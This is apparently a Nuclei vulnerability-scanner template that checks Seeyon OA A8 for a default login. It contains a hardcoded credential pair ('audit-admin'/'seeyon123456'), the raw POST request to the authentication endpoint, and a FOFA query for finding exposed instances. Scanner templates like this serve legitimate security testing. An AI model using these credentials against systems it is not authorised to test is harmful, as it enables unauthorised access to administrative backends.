50 lines
1.2 KiB
YAML
Executable File
50 lines
1.2 KiB
YAML
Executable File
id: seeyon-a8-default-login
|
|
|
|
info:
|
|
name: Seeyon OA A8 - Default Login
|
|
author: SleepingBag945
|
|
severity: high
|
|
description: |
|
|
Seeyon (seeyon) OA A8+ Enterprise Edition has a weak password vulnerability, which can be used to log in to the background
|
|
metadata:
|
|
verified: true
|
|
max-request: 1
|
|
fofa-query: app="致远互联-OA"
|
|
tags: seeyon,oa,default-login
|
|
|
|
http:
|
|
- raw:
|
|
- |
|
|
POST /seeyon/rest/authentication/ucpcLogin HTTP/1.1
|
|
Host: {{Hostname}}
|
|
Content-Type: application/x-www-form-urlencoded
|
|
|
|
UserAgentFrom=iphone&login_username={{username}}&login_password={{password}}
|
|
|
|
payloads:
|
|
username:
|
|
- 'audit-admin'
|
|
password:
|
|
- 'seeyon123456'
|
|
attack: pitchfork
|
|
|
|
matchers-condition: and
|
|
matchers:
|
|
- type: word
|
|
part: body
|
|
words:
|
|
- "\"LoginOK\":\"ok\""
|
|
- "audit-admin"
|
|
condition: and
|
|
|
|
- type: word
|
|
part: header
|
|
words:
|
|
- "application/json"
|
|
|
|
- type: status
|
|
status:
|
|
- 200
|
|
|
|
# digest: 4a0a00473045022100ed892a7bc2035bfbad25883a241cd0e579d10dbea9ffeabae31bedfc2d2feab602207d4bc080d9a6e906a747877cdca1064ad25e39561eed80a8dc1784d11d1035b9:922c64590222798bb761d5b6d8e72950
|